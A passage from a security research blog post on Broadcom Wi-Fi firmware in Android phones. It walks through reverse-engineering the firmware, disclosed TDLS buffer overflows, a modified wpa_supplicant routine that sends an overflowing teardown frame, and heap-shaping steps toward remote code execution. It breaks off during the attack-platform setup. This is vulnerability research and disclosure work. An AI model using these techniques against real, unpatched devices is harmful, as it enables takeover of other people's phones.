In this two-part blog series, we’ll explore the exposed attack surface introduced by Broadcom’s Wi-Fi SoC on mobile devices. Specifically, we’ll focus our attention on devices running Android, although a vast amount of this research applies to other systems including the same Wi-Fi SoCs. The first blog post will focus on exploring the Wi-Fi SoC itself; we’ll discover and exploit vulnerabilities which will allow us to remotely gain code execution on the chip. In the second blog post, we’ll further elevate our privileges from the SoC into the the operating system’s kernel. Chaining the two together, we’ll demonstrate full device takeover by Wi-Fi proximity alone, requiring no user interaction.
We’ll focus on Broadcom’s Wi-Fi SoCs since they are the most common Wi-Fi chipset used on mobile devices. A partial list of devices which make use of this platform includes the Nexus 5, 6 and 6P, most Samsung flagship devices, and all iPhones since the iPhone 4. For the purpose of this blog post, we’ll demonstrate a Wi-Fi remote code execution exploit on a fully updated (at the time) Nexus 6P, running Android 7.1.1 version NUF26K.
All the vulnerabilities in the post have been disclosed to Broadcom. Broadcom has been incredibly responsive and helpful, both in fixing the vulnerabilities and making the fixes available to affected vendors. For a complete timeline, see the bug tracker entries. They’ve also been very open to discussions relating to the security of the Wi-Fi SoC.
I would like to thank Thomas Dullien (@halvarflake) for helping boot up the research, for the productive brainstorming, and for helping search the literature for any relevant clues. I’d also like to thank my colleagues in the London office for helping make sense of the exploitation constraints, and for listening to my ramblings. Why-Fi?
In the past decade, the use of Wi-Fi has become commonplace on mobile devices. Gradually, Wi-Fi has evolved into a formidable set of specifications—some detailing the physical layer, others focusing on the MAC layer. In order to deal with this increased complexity, vendors have started producing “FullMAC” Wi-Fi SoCs.
In essence, these are small SoCs that perform all the PHY, MAC and MAC SubLayer Management Entity (MLME) processing on their own, allowing the operating system to abstract itself away from the complex (and sometimes chip-specific) features related to Wi-Fi. The introduction of Wi-Fi FullMAC chips has also improved the power consumption of mobile devices, since much of the processing is done on a low-power SoC instead of the power-hungry application processor. Perhaps most importantly, FullMAC chips are much easier to integrate, as they implement the MLME within their firmware, reducing the complexity on the host’s side.
All that said and done, the introduction of Wi-Fi FullMAC chips does not come without a cost. Introducing these new pieces of hardware, running proprietary and complex code bases, may weaken the overall security of the devices and introduce vulnerabilities which could compromise the entire system.

Exploring the Platform
To start off our research, we’ll need to find some way to explore the Wi-Fi chip. Luckily, Cypress has recently acquired Broadcom’s Wireless IOT business, and have published many of the datasheets related to Broadcom’s Wi-Fi chipsets (albeit for a slightly older SoC, the BCM4339). Reading through the datasheet, we gain some insight into the hardware architecture behind the Wi-Fi chipset.
Specifically, we can see that there’s an ARM Cortex R4 core, which runs all the logic for handling and processing frames. Moreover, the datasheet reveals that the ARM core has 640KB of ROM used to hold the firmware’s code, and 768KB of RAM which is used for data processing (e.g., heap) and to store patches to firmware code.
To start analysing the code running on the ARM core, we’ll need to extract the contents of the ROM, and to locate the data that is loaded into RAM.
Let’s start by tackling the second problem first - where is the data that’s loaded into the ARM core’s RAM? Since this data is not present in ROM, it must be loaded externally when the chip first powers on. Therefore, by reading through the initialisation code in the host’s driver, we should be able to locate the file containing the RAM’s contents. Indeed, going over the driver’s code, we find the BCMDHD_FW_PATH config, which is used to denote the location of the file whose contents are uploaded to RAM by the driver.
So what about the ROM’s contents? One way to extract the ROM would be to use the host driver’s chip memory access capabilities (via PIO over SDIO or PCIe) to read the ROM’s contents directly. However, doing so would require modifying the driver to enable us to issue the commands needed to dump the ROM. Another way to retrieve the ROM would be to load our own modified firmware file into RAM, into which we’ll insert a small stub that can be used to dump the ROM’s memory range. Luckily, none of these approaches is actually needed in this case; Broadcom provides an extremely powerful command-line utility called dhdutil, which can be used to interact with the chip via the bcmdhd driver.
Among the various capabilities this utility supports, it also allows us to directly read and write memory on the dongle by issuing a special command - “membytes”. Since we already know the size of the ROM (from the datasheet), we can just use the membytes command to read the ROM’s contents directly. However, there’s one last question we need to answer first - where is the ROM located? According to the great research done by the folks behind NexMon, the ROM is loaded at address 0x0, and the RAM is loaded at address 0x180000 (while NexMon focused on BCM4339, this fact remains true for newer chips as well, such as the BCM4358).
Finally, putting all this together, we can acquire the RAM’s contents from the firmware file, dump the ROM using dhdutil, and combine the two into a single file which we can then start analysing in IDA.Analysing the Firmware
Due to the relatively small size of the available memory (both ROM and RAM), Broadcom went to extreme efforts in order to conserve memory. For starters, they’ve stripped the symbols and most of the strings from the binary. This has the added bonus of making it slightly more cumbersome to reverse-engineer the firmware’s code. They’ve also opted for using the Thumb-2 instruction set exclusively, which allows for better code density. As a result, the ROM image on the BCM4358 is so tightly packed that it contains less than 300 unused bytes.
However, this is still not quite enough... Remember that the RAM has to accommodate the heap, stack and global data structures, as well as all the patches or modifications to ROM functions. Quite a tall order for a measly 768KB. To get around this, Broadcom has decided to place all the functions that are only used during the firmware’s initialisation in two special regions. Once the initialisation is completed, these regions are “reclaimed”, and are thereafter converted into heap chunks.
What’s more, heap chunks are interspersed between code and data structures in RAM - since the latter sometimes have alignment requirements (or are referenced directly from ROM, so they cannot be moved). The end result is that RAM is a jumbled mess of heap chunks, code and data structures.
After spending some time analysing the firmware, we can begin identifying at least a few strings containing function names and other hints, helping us get a grasp of the code base. Additionally, the NexMon researchers have released their gathered symbols corresponding to firmware on the BCM4339. We can apply the same symbols to the BCM4339’s firmware, and then use bindiff to correlate the symbol names in newer firmware versions for more recent chips.
Lastly, there’s one more trick in our hat - Broadcom produces SoftMAC chips in addition to the FullMAC SoCs we’re analysing. Since these SoftMAC chips don’t handle the MLME layer, their corresponding driver must perform that processing. As a result, much of Broadcom’s MLME processing code is included in the open-source SoftMAC driver - brcmsmac. While this won’t help us out with any of the chip-specific features or the more internal processing code, it does seem to share many utility functions with the firmware’s code.Hunting for Bugs
Now that we have a grasp of the firmware’s structure and have the means to analyse it, we can finally start hunting for bugs. But… Where should we start?
Even with all the tricks mentioned before, this is a relatively large and opaque binary, and strings or symbols are few and far between. One possibility would be to instrument the firmware in order to trace the code paths taken while a packet is received and processed. The Cortex R4 does, indeed, have debug registers which can be used to place breakpoints and inspect the code flow at various locations. Alternately, we could manually locate a set of functions which are used to parse and retrieve information from a received frame, and work our way backwards from there.
This is where familiarity with Wi-Fi comes in handy; Wi-Fi management frames encode most of their information in small “tagged” chunks of data, called Information Elements (IEs). These tagged chunks of data are structured as TLVs, where the tag and length fields are a single byte long.

Since a large portion of the information transferred in Wi-Fi frames (other than the data itself) is encoded using IEs, they make for good candidates from which we can work our way backwards. Moreover, as “tag” values are unique and standardised, we can use their values to help familiarise ourselves with the currently handled code flow.
Looking at the brcmsmac driver, we can see that there’s a single function which Broadcom uses in order to extract IEs from a frame - bcm_parse_tlvs. After a brief search (by correlating hints from nearby strings), we find the same function in the firmware’s ROM. Great.
Now we can start cross-referencing locations which call this function, and reverse each of these call-sites. While substantially easier than reversing every part of the firmware, this still takes a considerable amount of time (as the function has more than 110 cross-references, some to other wrapper functions which themselves are called from multiple locations).
After reverse engineering all of the call sites, I’ve found a few vulnerabilities related to the handling of information elements embedded in management frames.
Two of the vulnerabilities can be triggered when connecting to networks supporting wireless roaming features; 802.11r Fast BSS Transition (FT), or Cisco’s CCKM roaming. On the one side, these vulnerabilities should be relatively straightforward to exploit - they are simple stack overflows. Moreover, the operating system running on the firmware (HNDRTE) does not use stack cookies, so there’s no additional information leak or bypass required.
However, while these vulnerabilities may be comfortable to exploit, they require some set-up to get working. First, we’d need to broadcast Wi-Fi networks that support these features. 802.11r FT is an open(-ish) standard, and is implemented by hostapd. In contrast, CCKM is a proprietary standard (although some information can be found online). Figuring out how to emulate a CCKM network (or buying a CCKM-capable WLC from Cisco) would be cumbersome (or costly).
Additionally, we’d need to figure out which devices actually support the aforementioned features. Broadcom provides many features which can be licensed by customers -- not all features are present on all devices (in fact, their corresponding patches probably wouldn’t even fit in RAM).
Luckily, Broadcom makes it easy to distinguish which features are actually present in each firmware image. The last few bytes in the RAM contents downloaded to the chip contain the firmware’s “version string”. This string contains the date at which the firmware was compiled, the chip’s revision, the firmware’s version and a list of dash-delimited “tags”. Each tag represents a feature that is supported by the firmware image. For example, here’s the version string from the Nexus 6P:
4358a3-roml/pcie-ag-p2p-pno-aoe-pktfilter-keepalive-sr-mchan-pktctx-hostpp-lpc-pwropt-txbf-wl11u-mfp-betdls-amsdutx5g-txpwr-rcc-wepso-sarctrl-btcdyn-xorcsum-proxd-gscan-linkstat-ndoe-hs20sta-oobrev-hchk-logtrace-rmon-apf-d11status Version: 7.112.201.1 (r659325) CRC: 8c7aa795 Date: Tue 2016-09-13 15:05:58 PDT Ucode Ver: 963.317 FWID: 01-ba83502b
The presence of the 802.11r FT feature is indicated by the “fbt” tag. Similarly, support for CCKM is indicated by the “ccx” tag. Unfortunately, it seems that the Nexus 6P supports neither of these features. In fact, running a quick search for the “ccx” feature (CCKM support) on my own repository of Android firmware images revealed that this feature is not supported on any Nexus device, but is supported on a wide variety of Samsung flagship devices, a very partial list of which includes the Galaxy S7 (G930F, G930V), the Galaxy S7 Edge (G935F, G9350), the Galaxy S6 Edge (G925V) and many more.
So what about the other two vulnerabilities? Both of them relate to the implementation of Tunneled Direct Link Setup (TDLS). TDLS connections allow peers on a Wi-Fi network to exchange data between one another without passing it through the Access Point (AP), thus preventing congestion at the AP.
Support for TDLS in the firmware is indicated by the “betdls” and “tdls” tags. Searching through my firmware repository I can see that the vast majority of devices do, indeed, support TDLS. This includes all recent Nexus devices (Nexus 5, 6, 6P) and most Samsung flagships.
What’s more, TDLS is specified as part of the 802.11z standard (requires IEEE subscription). Since all the information regarding TDLS is available, we could read the standard in order to gain familiarity with the relevant code paths in Broadcom’s implementation. As an open standard, it is also supported by open-source supplicants, such as wpa_supplicant. As a result, we can inspect the implementation of the TDLS features in wpa_supplicant in order to further improve our understanding of the relevant code in the firmware.
Lastly, as we’ll see later on, triggering these two vulnerabilities can be done by any peer on the Wi-Fi network, without requiring any action on the part of the device being attacked (and with no indication that such an attack is taking place). This makes these vulnerabilities all the more interesting to explore.
In any case, it seems like we’ve made our mind up! We’re going to exploit the TDLS vulnerabilities. Before we do so, however, let’s take a second to learn a little bit about TDLS, and the vulnerabilities discovered (skip this part it you’re already familiar with TDLS).
802.11z TDLS 101
There are many use cases where two peers on the same Wi-Fi network wish to transfer large swaths of data between one another. For example, casting a video from your mobile device to your Chromecast would require large amounts of data to be transmitted. In most cases, the Chromecast would be relatively nearby to the caster (after all, you’d probably be watching the screen to which you’re casting). Therefore, it would seem wasteful to pass the entire data stream from the device to the AP, only to then pass it on to the Chromecast.
It’s not just the increased latency of adding an additional hop (the AP) that will degrade the connection’s quality. Passing such large amounts of data to the AP would also put a strain on the AP itself, cause congestion, and would degrade the Wi-Fi connectivity for all peers on the network.
This is where TDLS comes into play. TDLS is meant to provide a means of peer-to-peer communication on a Wi-Fi network that is AP-independant.Over The Air
Let’s start by familiarising ourselves with the structure of TDLS frames. As you may know, 802.11 frames use the “flags” field in order to indicate the “direction” in which a frame is travelling (from the client to the AP, AP to client, etc.). TDLS traffic co-opts the use of the flag values indicating traffic in an Ad-Hoc (IBSS) network (To-DS=0, From-DS=0).

Next, TDLS frames are identified by a special ethertype value - 0x890D. TDLS frames transmitted over Wi-Fi use a constant value in the “payload type” field, indicating that the payload has the following structure:

The category for TDLS frames is also set to a constant value. This leaves us with only one field which distinguishes between different TDLS frame types - the “action code”. This 1-byte field indicates the kind of TDLS frame we’re transmitting. This, in turn, controls the way in which the “payload” in interpreted by the receiving end.High-Level Flow
Before two peers can establish a connection, they must first know about the existence of one another. This is called the “discovery” phase. A Wi-Fi client that wishes to discover TDLS-capable peers on the network, can do so by sending a “TDLS Discovery Request” frame to a peer. A TDLS-capable peer that receives this frame, responds by sending a “TDLS Discovery Response” frame. The request and response are correlated to one another using a 1-byte “dialog token”.

Next, the peers may wish to set up a connection. To do so, they must perform a 3-way handshake. This handshake serves a dual purpose; first, it indicates that a connection is successfully established between the two peers. Second, it’s used to derive the TDLS Peer Key (TPK), which secures the TDLS traffic between the peers.

Finally, once the connection is created, the two peers can exchange peer traffic between one another. When one of the peers wishes to tear-down the connection, they may do so by sending a “TDLS Teardown” frame. Upon reception of such a frame, the TDLS-peer will remove the connection and free up all the related resources.
Now that we know enough about TDLS, let’s take a closer look at the vulnerabilities at hand!The Primitives
In order to ensure the integrity of messages transferred during the setup and teardown phases, the corresponding TDLS frames include Message Integrity Codes (MIC). For the setup phase, once the second handshake message (M2) is received, the TPK can be derived by both parties. Using the TPK, the TDLS-initiator can calculate a MIC over the contents of the third handshake frame, which can then be verified by the TDLS-responder.
The MIC is calculated over the contents of the IEs encoded in the handshake frame, as follows:

Similarly, teardown frames also include a MIC, calculated over a slightly different set of IEs:

So how can we find these calculations in the firmware’s code? Well, as luck would have it, some strings referring to TDLS were left-over in the firmware’s ROM, allowing us to quickly home in on the relevant functions.
After reverse-engineering much of the flow leading up to the processing of handling TDLS action frames, we finally reach the function responsible for handling TDLS Setup Confirm (PMK M3) frames. The function first performs some validations to ensure that the request is legitimate. It queries the internal data structures to ensure that a TDLS connection is indeed being set up with the requesting peer. Then, it verifies the Link-ID IE (by checking that its encoded BSSID matches that of the current network), and also verifies the 32-byte initiator nonce (“Snonce”) value (by comparing it to the stored initial nonce).
Once a certain degree of confidence is established that the request may indeed be legitimate, the function moves on to call an internal helper function, tasked with calculating the MIC and ensuring that it matches the one encoded in the frame. Quite helpfully, the firmware also includes the name for this function (“wlc_tdls_cal_mic_chk”).
After reverse-engineering the function, we arrive at the following approximate high-level logic:
1.  uint8_t* buffer = malloc(256);
2.  uint8_t* pos = buffer;
3.  
4.  //Copying the initial (static) information
5.  uint8_t* linkid_ie = bcm_parse_tlvs(..., 101);
6.  memcpy(pos, linkid_ie + 0x8, 0x6);  pos += 0x6;              //Initiator MAC
7.  memcpy(pos, linkid_ie + 0xE, 0x6);  pos += 0x6;              //Responder MAC
8.  *pos = transaction_seq;             pos++;                   //TransactionSeq
9.  memcpy(pos, linkid_ie, 0x14);       pos += 0x14;             //LinkID-IE
10.
11. //Copying the RSN IE
12. uint8_t* rsn_ie = bcm_parse_tlvs(..., 48);
13. if (rsn_ie[1] + 2 + (pos - buffer) > 0xFF) {
14.     ... //Handle overflow
15. }
16. memcpy(pos, rsn_ie, rsn_ie[1] + 2); pos += rsn_ie[1] + 2;    //RSN-IE
17.
18. //Copying the remaining IEs
19. uint8_t* timeout_ie = bcm_parse_tlvs(..., 56);
20. uint8_t* ft_ie      = bcm_parse_tlvs(..., 55);
21. memcpy(pos, timeout_ie, 0x7);       pos += 0x7;              //Timeout Interval IE
22. memcpy(pos, ft_ie, 0x54);           pos += 0x54;             //Fast-Transition IE
As can be seen above, although the function verifies that the RSN IE’s length does not exceed the allocated buffer’s length (line 13), it fails to verify that the subsequent IEs also do not overflow the buffer. As such, setting the RSN IE’s length to a large value (e.g., such that rsn_ie[1] + 2 + (pos - buffer) == 0xFF) will cause the Timeout Interval and Fast Transition IEs to be copied out-of-bounds, overflowing the buffer.
For example, assuming we set the length of the RSN IE (x) to its maximal possible value, 224, we arrive at the following placements of elements:

In this diagram, orange fields are those which are “irrelevant” for the overflow, since they are positioned within the buffer’s bounds. Red fields indicate values that cannot be fully controlled by us, and green fields indicate values which are fully controllable.
For example, the Timeout Interval IE is verified prior to the MIC’s calculation and only has a constrained set of allowed values, making it uncontrollable. Similarly, the FTIE’s tag and length fields are constant, and therefore not controllable. Lastly, the 32-byte “Anonce” value is randomly chosen by the TDLS responder, placing it firmly out of our field of influence.
But the situation isn’t that grim. In fact, several of the fields in the FTIE itself can be arbitrarily chosen - for example, the “Snonce” value is chosen by the TLDS-initiator during the first message in the handshake. Moreover, the “MIC Control” field in the FTIE can be freely chosen, since it is not verified prior to the execution of this function.
In any case, now that we’ve audited the MIC verification for the setup stage, let’s turn our sights towards the MIC verification during the teardown stage. Perhaps the code is similarly broken there? Taking a look at the MIC calculation in the teardown stage (“wlc_tdls_cal_mic_chk”), we arrive at the following high-level logic:
1.  uint8_t* buffer = malloc(256);
2.  ...
3.  uint8_t* linkid_ie = bcm_parse_tlvs(..., 101); //Link ID
4.  memcpy(buffer, linkid_ie, 0x14);
5.  ...
6.  uint8_t* ft_ie = bcm_parse_tlvs(..., 55);
7.  memcpy(buffer + 0x18, ft_ie, ft_ie[1] + 2);    //Fast-Transition IE
Ah-ha, so once again a straightforward overflow; the FT-IE’s length field is not verified to ensure that it doesn’t exceed the length of the allocated buffer. This means that simply by providing a crafted FT-IE, we can trigger the overflow. Nevertheless, once again there are several verifications prior to triggering the vulnerable code path which limit our control on the overflowing elements. Let’s try and plot the placement of elements during the overflow:

This seems much simpler - we don’t need to worry ourselves about the values stored in the FTIE that are verified prior to the overflow, since they’re all placed neatly within the buffer’s range. Instead, the attacker controlled portion is simply spare data that is not subject to any verification, and can therefore be freely chosen by us. That said, the overflow’s extent is quite limited - we can only overwrite at most 25 bytes beyond the range of the buffer.Writing an Exploit Investigating the Heap State
At long last we have a grasp of the primitives at hand. Now, it’s time to test out whether our hypotheses match reality. To do so, we’ll need a testbed that’ll enable us to send crafted frames, triggering the overflows. Recall that wpa_supplicant is an open-source portable supplicant that fully supports TDLS. This makes it a prime candidate for our research platform. We could use wpa_supplicant as a base on top of which we’ll craft our frames. That would save us the need to re-implement all the logic entailed in setting up and maintaining a TDLS connection.
To test out the vulnerabilities, we’ll modify wpa_supplicant to allow us to send TDLS Teardown frames containing an overly-large FTIE. Going over wpa_supplicant’s code, we can quickly identify the function in charge of generating and sending the teardown frame - wpa_tdls_send_teardown. By adding a few small changes to this function (in green) we should be able to trigger the overflow upon reception the teardown frame, causing 25 bytes of 0xAB to be written OOB:
static int wpa_tdls_send_teardown(struct wpa_sm *sm, const u8 *addr, u16 reason_code){ ... ftie = (struct wpa_tdls_ftie *) pos; ftie->ie_type = WLAN_EID_FAST_BSS_TRANSITION; ftie->ie_len = 255; os_memset(pos + 2, 0x00, ftie->ie_len); os_memset(pos + ftie->ie_len + 2 - 0x19, 0xAB, 0x19); //Overflowing with 0xAB
os_memcpy(ftie->Anonce, peer->rnonce, WPA_NONCE_LEN); os_memcpy(ftie->Snonce, peer->inonce, WPA_NONCE_LEN); pos += ftie->ie_len + 2; ...}
Now we just need to interact with wpa_supplicant in order to setup and teardown a TDLS connection to our target device. Conveniently, wpa_supplicant supports many command interfaces, including a command-line utility called wpa_cli. This command line interface also supports several commands exposing TDLS functionality:
  • TDLS_DISCOVER - Sends a “TDLS Discovery Request” frame and lists the response
  • TDLS_SETUP - Creates a TDLS connection to the peer with the given MAC address
  • TDLS_TEARDOWN - Tears down the TDLS connection to the peer with the given MAC

Indeed, after compiling wpa_supplicant with TDLS support (CONFIG_TDLS), setting up a network, and connecting our target device and our research platform to the network, we can see that issuing the TDLS_DISCOVER command works - we can indeed identify our peer.

Moving on, we can now send a TDLS_SETUP command, followed by our crafted TDLS_TEARDOWN. If everything adds up correctly, this should trigger the overflow. However, this raises a slightly more subtle question - how will we know when the overflow occurs? It may just so happen that the data we’re overflowing is unused. Alternately, it may be the case that when the firmware crashes, it just silently starts up again, leaving us none the wiser.
To answer this fully, we’ll need to understand the logic behind Broadcom’s heap implementation. Digging into the allocator’s logic, we find that it is extremely straightforward; it is a simple “best-fit” allocator, which performs forward and backward coalescing, and keeps a singly linked list of free chunks. When chunks are allocated, they are carved from the end (highest address) of the best-fitting free chunk (smallest chunk that is large enough). Heap chunks have the following structure:(recall that the Cortex R4 is a 32-bit ARM processor, so all fields are stored in little-endian)
By reverse-engineering the allocator’s implementation, we can also find the location of the pointer to the head of the first free-chunk in RAM. Combining these two facts together, we can create a utility which, given a dump of the firmware’s RAM, can plot the current state of the heap’s freelist. Acquiring a snapshot of the firmware’s RAM can be easily achieved by using dhdutil’s “upload” command.
After writing a small visualiser script which walks over the heap’s freelist and exports the its contents into dot, we can plot the state of the freelist using graphviz, like so:

Now, we can send out crafted TDLS_TEARDOWN frame, immediately take a snapshot of the firmware’s RAM, and check the freelist for any signs of corruption:

Ah-ha! Indeed one of the chunks in the freelist suddenly has an exceptionally large size after tearing down the connection. Recall that since the allocator uses “best-fit”, this means that subsequent allocations won’t be placed in this block as long as other large enough free chunks exist. This also means that the firmware did not crash, and in fact continued to function correctly. Had we not visualised the state of the heap, we wouldn’t have been able to determine anything had happened at all.
In any case, now that we’ve confirmed that the overflow does in fact occur, it’s time to move to the next stage of exploitation. We need less crude tools in order to allow us to monitor the state of the heap during the setup and teardown processes. To this end, it would be advantageous to hook the malloc and free functions in the firmware, and to trace their arguments and return values.
First, we’ll need to write a “patcher”, which will allow us to insert hooks on given RAM-resident functions. It’s important to note that both the malloc and free functions are both present in RAM (they are among the first functions in the RAM’s code chunk). This allows us to freely re-write their prologues in order to introduce a branch to our own code. I’ve written a patcher which performs insertion of such hooks, allowing execution of small assembly stubs before and after the invocation of the hooked function.
In short, the patcher is fairly standard - it writes the patch’s code to an unused region in RAM (the head of the largest free chunk in the heap), and then inserts a Thumb-2 wide branch (which is, coincidentally, perhaps the ugliest encoding for an opcode I’ve ever seen - see 4.6.12 T4) from the prologue of the hooked function to the hook itself.

Using our new patcher, we can now instrument the malloc and free functions in order to add traces allowing us to follow every operation occurring on the heap. These traces can then be read from the firmware’s console buffer, by issuing dhdutil’s “consoledump” command. Note that on some newer chips, like the BCM4358 on the Nexus 6P, this command fails. This is because Broadcom forgot to add the offset to the magic pointer in the firmware pointing to the console’s data structure. You can fix this either by adding the correct offset to the driver (see debug_info_ptrs), or by writing the magic value and pointer to one of the probed memory addresses in the list.
In any case, you can find both the malloc and free hooks, and the associated scripts needed to parse the traces from the firmware, here.
Using the newly acquired traces, we can write a better visualiser, allowing us to trace the state of the heap throughout the setup and teardown phases. This visualiser will have visibility into every operation occurring on the heap, offering far more granular data. I’ve written such a visualiser, which you can find here.
Without further ado, let’s take a look at heap activity while establishing a TDLS connection:
The vertical axis denotes time - each line is a new heap state after a malloc or free operation. The horizontal axis denotes space - lower addresses are on the left, while higher addresses are on the right. Red blocks indicate chunks that are in-use, grey blocks indicate free chunks.
As we can clearly see above, establishing a TDLS connection is a messy operation. There are many allocations and deallocations, for regions both large and small. This abundance of noise doesn’t bode well for us. Recall that the overflow during the setup stage is highly constrained, both in terms of the data being written, and in terms of the extent of the overflowing data. Moreover, the overflow occurs during one of the many allocations in the setup phase. This doesn’t allow us much control over the state of the heap prior to triggering the overflow.
Taking a step back, however, we can observe a fairly surprising fact. Apart from the heap activity during the TDLS connection establishment, it seems like there is little to no activity on the heap whatsoever. In fact, it turns out that transmitted and received frames are drawn from a shared pool, instead of the heap. Not only that, but their processing doesn’t incur a single heap operation - everything is done “in-place”. Even when trying to intentionally cause allocations by sending random frames containing exotic bit combinations, the firmware’s heap remains largely unaffected.
This is both a blessing and a curse. On the one hand, it means that the heap’s structure is highly consistent. In the seldom events that data structures are allocated, they are immediately freed thereafter, restoring the heap to its original state. On the other hand, it means that our degree of control over the heap’s structure is fairly limited. For the most part, whatever structure the heap has after the firmware’s initialisation, is what we’re going to have to work with (unless, of course, we find some primitive that will allow us to better shape the heap).
Perhaps we should take a look at the teardown stage instead? Indeed, activating the traces during the TDLS teardown stage reveals that there are very few allocations prior to triggering the overflow, so it seems like a much more convenient environment to explore.

While these in-depth traces are useful for getting a high-level view of the heap’s state, they are rather difficult to decipher. In fact, in most cases it’s sufficient to take a single snapshot of the heap and just visualise it, as we did earlier with the graphviz visualiser. In that case, let’s improve our previous heap visualiser by allowing it to produce detailed graphical output, based on a single snapshot of the heap.
As we’ve seen earlier, we can “walk” over the freelist to extract the location and size of each free chunk. Moreover, we can deduce the location of in-use chunks by walking over the gaps between free chunks and reading the “size” field from each in-use chunk. I’ve written yet another visualiser that does just that - it simply produces a visualisation of the heap’s state from a series of “snapshot” images.
Using this visualiser, we can now take a look at the state of the heap after setting up a TDLS connection. This will be the state of the heap we need to work with when we trigger the overflow during the teardown stage.(Upper Layer: initial heap state, Bottom Layer: heap state after creating a TDLS connection)
We can see that after setting up the TDLS connection, most of the heap’s used chunks are consecutive, but also two holes are formed; one of size 0x11C, and another of size 0x124. Activating the traces for the teardown stage, we can see that the following allocations occur:
(29) malloc - size: 284, caller: 1828bb, res: 1f0404(30) free - ptr: 1f0404 (31) malloc - size: 20, caller: 18c811, res: 1f1654(32) malloc - size: 160, caller: 18c811, res: 1f0480(33) malloc - size: 8, caller: 80eb, res: 1f2a44(34) free - ptr: 1f2a44(35) free - ptr: 1f1654(36) free - ptr: 1f0480(37) malloc - size: 256, caller: 7aa15, res: 1f0420(38) malloc - size: 16, caller: 7aa23, res: 1f1658
The highlighted line denotes the allocation of the 256-byte buffer for the teardown frame’s MIC calculation, that same one we can overflow using our vulnerability. Moreover, it seems as though the heap activity is quite low prior to sending the overflow frame. Combining the heap snapshot above with the trace file, we can deduce that the best-fitting chunk for the 256-byte buffer is in the 0x11C-byte hole. This means that using our 25-byte overflow we’ll be able to overwrite:
  1. The header of the next in-use chunk
  2. A few bytes from the contents of the next in-use chunk

Let’s take a closer look at the next in-use chunk and see whether there’s any interesting information that we’d like to overwrite there:

Ah, so the next chunk is mostly empty, save for a couple of pointers near its head. Are these pointers of any use to us? Perhaps they are written to? Or freed at a later stage? We can find out by manually corrupting these pointers (pointing them at invalid memory addresses, such as 0xCDCDCDCD), and instrumenting the firmware’s exception vector to see whether it crashes. Unfortunately, after many such attempts, it seems as though none of these pointers are in fact used.
This leaves us, therefore, with a single possibility - corrupting the “size” field of the in-use chunk. Recall that once the TDLS connection is torn down, the data structures relating to it are freed. Freeing an in-use chunk whose size we’ve corrupted could have many interesting consequences. For starters, if we reduce the size of the chunk, we can intentionally “leak” the tail end of the buffer, causing it to remain forever un-allocatable. Much more interestingly, however, we could set the chunk’s size to a larger value, thereby causing the next free operation to create a free chunk whose tail end overlaps another heap chunk.

Once a free chunk overlaps another heap chunk, subsequent allocations for which the overlapping free chunk is the best-fit will be carved from the end of the free chunk, thereby corrupting whatever fields reside at its tail. Before we start scheming, however, we need to confirm that we can create such a state (i.e., an overlapping chunk), after the teardown operation completes.Creating an Overlapping Chunk
Recall that the MIC check is just one of many operations that take place when a TDLS connection is torn down. It may just so happen that by overwriting the next chunk’s size, once it is freed during the collection of the TDLS session’s data structures, it may become the best-fit for subsequent allocations during the teardown process. These allocations may then cause additional unintended corruptions, which will either leave the heap in a non-consistent state or even crash the firmware.
However, the search space for possible sizes isn’t that large - assuming we’re only interested in chunk sizes that are not larger than the RAM itself (for obvious reasons), we can simply enumerate each of the heap states produced by overwriting the “size” field of the next chunk with a given value and tearing down the connection. This can be automated by using a script on the sending (to perform the enumeration), while concurrently acquiring “snapshots” of RAM on the device, and observing their state (whether or not they are consistent, and whether the firmware managed to resume operation after the teardown).
Specifically, it would be highly advantageous if we were able to create a heap state whereby two free chunks overlap one another. In such a condition, allocations taken from one chunk, can be used to corrupt the “next” pointer of the other free chunk. This could be used, perhaps, to control the location of subsequent allocations - an interesting primitive in it’s own right.
In any case, after running through a few chunk sizes, tearing down the TDLS connection and observing the heap state, we come across quite an interesting resulting state! By overwriting the “size” field with the value 72 and tearing down the connection, we achieve the following heap state:
Great! So after tearing down the connection, we are left with a zero-sized free chunk, overlapping a different (larger) free chunk! This means that once an allocation is carved from the large chunk, it will corrupt the “size” and “next” fields of the smaller chunk. This could prove very useful - we could try and point the next free chunk at a memory address whose contents we’d like to modify. As long as the data in that address conforms with the format of a free chunk, we might be able to persuade the heap to overwrite the memory at that address with subsequent allocations.Finding a Controlled Allocation
To start exploring these possibilities, we’ll first need to create a controlled allocation primitive, meaning we either control the size of the allocation, or it’s contents, or (ideally) both. Recall that, as we’ve seen previously, it is in fact very hard to trigger allocations during the normal processing of the firmware - nearly all the processing is done in-place. Moreover, even for cases where data is allocated, its lifespan is very short; memory is immediately reclaimed once it’s no longer used.
Be that as it may, we’ve already seen at least one set of data structures whose lifetime is controllable, and which contains multiple different pieces of information - the TDLS connection itself. The firmware must keep all the information pertaining to the TDLS connection as long as its active. Perhaps we could find some data structure relating to TDLS which could act as a good candidate for a controlled allocation?
To search for one, let’s start by looking at the function handling each of the TDLS action frames - wlc_tdls_rcv_action_frame. The function starts by reading out the TDLS category and action code. Then, it routes the frame to the appropriate handler function, according to the received action code:

We can see that apart from the regular, specification-defined action codes, the firmware also supports an out-of-spec frame with an action code of 127. Anything out-of-spec is automatically suspect, so that might be as good a place as any to look for our primitive.
Indeed, digging into this function, we find out that it performs a rather curious task. First, it verifies that the first 3 bytes in the frame’s contents match the Wi-Fi alliance OUI (50:6F:9A). Then, it retrieves the fourth byte of the frame, and uses it as a “command code”. Currently, only two vendor-specific commands are implemented, commands #4 and #5. On a high-level; command #4 is used to send a tunneled probe request over the TDLS connection, and command #5 is used to send an “event” notification to the host, signalling that a “special” frame has arrived.
However, much more interestingly, we see that the implementation for command #4 seems relevant to our current pursuit. First, it does not require the existence of a TDLS connection in order to be processed! This allows us to send the frame even after tearing down the connection. Second, by activating heap traces during this function’s execution and reverse-engineering its logic, we find that the function triggers the following high-level sequence of events:
1. if (A) { free(A); }2. A = malloc(received_frame_size);3. memcpy(A, received_frame, received_frame_size);4. B = malloc(788);5. free(B)6. C = malloc(284);7. free(C);
Great! So we get an allocation (A) with a controlled lifetime, a controlled size and controlled contents! What more could we possibly ask for?
There is one tiny snag, however. Modifying wpa_supplicant to send this crafted TDLS frame results in a resounding failure. While wpa_supplicant allows us to fully control many of the fields in the TDLS frames, it is only a supplicant, not an MLME implementation. This means that the corresponding MLME layer is responsible for composing and sending the actual TDLS frames.
On the setup I’m using for the attack platform, I have a laptop running Ubuntu 16.04, and a TP-Link TL-WN722N dongle. The dongle is a SoftMAC configuration, so the MLME layer in play is the one present in the Linux kernel, namely, the “cfg80211” configuration layer.
